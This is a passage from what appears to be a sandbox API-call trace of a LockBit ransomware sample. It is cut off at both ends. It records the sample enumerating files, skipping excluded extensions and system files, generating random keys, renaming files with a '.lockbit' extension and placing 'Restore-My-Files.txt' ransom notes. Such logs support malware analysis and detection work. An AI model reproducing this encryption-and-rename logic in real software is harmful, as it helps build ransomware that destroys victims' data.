Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0292248.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0155.327] malloc (_Size=0xa6) returned 0x1fa2ed8 [0155.328] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0155.329] free (_Block=0x1fa2ed8) [0155.329] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0292248.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0155.329] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0155.329] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0155.329] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5668dad0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x7aa6, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0292270.WMF", cAlternateFileName="")) returned 1 [0155.329] lstrcmpiW (lpString1=".", lpString2="J0292270.WMF") returned -1 [0155.329] lstrcmpiW (lpString1="..", lpString2="J0292270.WMF") returned -1 [0155.329] PathFindExtensionW (pszPath="J0292270.WMF") returned=".WMF" [0155.329] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0155.329] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0155.329] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0155.329] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0155.329] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0155.329] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0155.329] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0155.329] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0155.329] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0155.329] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0155.329] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0155.329] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0155.329] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0155.329] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0155.330] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0155.330] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0155.330] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0155.330] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0155.330] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0155.330] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0155.330] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0155.330] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0155.330] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0155.330] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0155.330] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0155.330] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0155.330] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0155.330] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0155.330] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0155.330] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0155.330] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0155.330] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0155.330] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0155.330] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0155.330] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0155.330] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0155.330] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0155.330] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0155.330] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0155.330] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0155.330] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0155.330] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0155.330] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0155.330] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0155.331] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0155.331] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0155.331] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0155.331] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0292270.WMF") returned 1 [0155.331] lstrcmpiW (lpString1="ntldr", lpString2="J0292270.WMF") returned 1 [0155.331] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0292270.WMF") returned 1 [0155.331] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0292270.WMF") returned -1 [0155.331] lstrcmpiW (lpString1="autorun.inf", lpString2="J0292270.WMF") returned -1 [0155.331] lstrcmpiW (lpString1="thumbs.db", lpString2="J0292270.WMF") returned 1 [0155.331] lstrcmpiW (lpString1="iconcache.db", lpString2="J0292270.WMF") returned -1 [0155.331] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0155.331] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0292270.WMF") returned=".WMF" [0155.331] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0155.331] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0155.331] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0155.331] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0155.331] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0155.331] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0155.331] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0155.331] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0155.331] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0155.331] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0155.331] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0155.331] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0155.331] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0155.331] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0155.331] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0155.331] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0155.331] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0155.332] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0155.332] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0155.332] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0155.332] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0155.332] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0155.332] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0155.332] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0155.332] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0155.332] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0155.332] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0155.332] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0155.332] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0292270.WMF.lockbit") returned 72 [0155.332] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0292270.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0292270.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0155.333] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0155.333] malloc (_Size=0x40068) returned 0x3df0008 [0155.333] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=31398) returned 1 [0155.333] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.333] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.333] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0155.333] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.334] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0155.334] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0155.337] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0292270.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0292270.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0155.337] malloc (_Size=0xa6) returned 0x1fa2ed8 [0155.337] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0155.338] free (_Block=0x1fa2ed8) [0155.338] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0292270.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0155.338] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0155.338] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0155.338] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66116650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1b64, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0292272.WMF", cAlternateFileName="")) returned 1 [0155.339] lstrcmpiW (lpString1=".", lpString2="J0292272.WMF") returned -1 [0155.339] lstrcmpiW (lpString1="..", lpString2="J0292272.WMF") returned -1 [0155.339] PathFindExtensionW (pszPath="J0292272.WMF") returned=".WMF" [0155.339] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0155.339] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0155.339] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0155.339] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0155.339] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0155.339] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0155.339] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0155.339] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0155.339] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0155.339] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0155.339] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0155.339] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0155.339] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0155.339] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0155.339] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0155.339] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0155.339] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0155.339] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0155.339] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0155.339] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0155.339] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0155.339] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0155.339] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0155.339] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0155.340] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0155.340] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0155.340] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0155.340] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0155.340] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0155.340] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0155.340] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0155.340] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0155.340] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0155.340] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0155.340] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0155.340] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0155.340] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0155.340] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0155.340] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0155.340] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0155.340] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0155.340] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0155.340] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0155.340] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0155.340] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0155.340] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0155.340] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0155.340] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0292272.WMF") returned 1 [0155.340] lstrcmpiW (lpString1="ntldr", lpString2="J0292272.WMF") returned 1 [0155.340] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0292272.WMF") returned 1 [0155.341] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0292272.WMF") returned -1 [0155.341] lstrcmpiW (lpString1="autorun.inf", lpString2="J0292272.WMF") returned -1 [0155.341] lstrcmpiW (lpString1="thumbs.db", lpString2="J0292272.WMF") returned 1 [0155.341] lstrcmpiW (lpString1="iconcache.db", lpString2="J0292272.WMF") returned -1 [0155.341] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0155.341] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0292272.WMF") returned=".WMF" [0155.341] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0155.341] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0155.341] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0155.341] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0155.341] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0155.341] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0155.341] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0155.341] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0155.341] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0155.341] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0155.341] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0155.341] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0155.341] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0155.341] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0155.341] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0155.341] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0155.341] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0155.341] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0155.341] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0155.341] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0155.342] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0155.342] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0155.342] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0155.342] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0155.342] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0155.342] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0155.342] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0155.342] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0155.342] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0292272.WMF.lockbit") returned 72 [0155.342] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0292272.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0292272.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0155.343] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0155.343] malloc (_Size=0x40068) returned 0x3d70450 [0155.343] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=7012) returned 1 [0155.343] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.343] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0155.343] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.344] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0155.344] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0155.347] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0292272.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0292272.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0155.347] malloc (_Size=0xa6) returned 0x1fa2ed8 [0155.347] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0155.348] free (_Block=0x1fa2ed8) [0155.348] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0292272.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0155.348] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0155.348] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0155.348] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5668dad0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3658, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0292278.WMF", cAlternateFileName="")) returned 1 [0155.348] lstrcmpiW (lpString1=".", lpString2="J0292278.WMF") returned -1 [0155.348] lstrcmpiW (lpString1="..", lpString2="J0292278.WMF") returned -1 [0155.348] PathFindExtensionW (pszPath="J0292278.WMF") returned=".WMF" [0155.348] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0155.348] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0155.349] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0155.349] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0155.349] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0155.349] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0155.349] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0155.349] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0155.349] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0155.349] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0155.349] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0155.349] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0155.349] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0155.349] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0155.349] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0155.349] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0155.349] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0155.349] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0155.349] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0155.349] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0155.349] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0155.349] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0155.349] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0155.349] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0155.349] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0155.350] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0155.350] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0155.350] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0155.350] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0155.350] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0155.350] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0155.350] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0155.350] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0155.350] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0155.350] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0155.350] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0155.350] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0155.350] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0155.350] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0155.350] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0155.350] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0155.350] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0155.350] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0155.350] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0155.350] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0155.350] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0155.350] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0155.350] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0292278.WMF") returned 1 [0155.350] lstrcmpiW (lpString1="ntldr", lpString2="J0292278.WMF") returned 1 [0155.351] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0292278.WMF") returned 1 [0155.351] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0292278.WMF") returned -1 [0155.351] lstrcmpiW (lpString1="autorun.inf", lpString2="J0292278.WMF") returned -1 [0155.351] lstrcmpiW (lpString1="thumbs.db", lpString2="J0292278.WMF") returned 1 [0155.351] lstrcmpiW (lpString1="iconcache.db", lpString2="J0292278.WMF") returned -1 [0155.351] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0155.351] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0292278.WMF") returned=".WMF" [0155.351] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0155.351] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0155.351] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0155.351] lstrcmpiW (lpString1=".ckp", 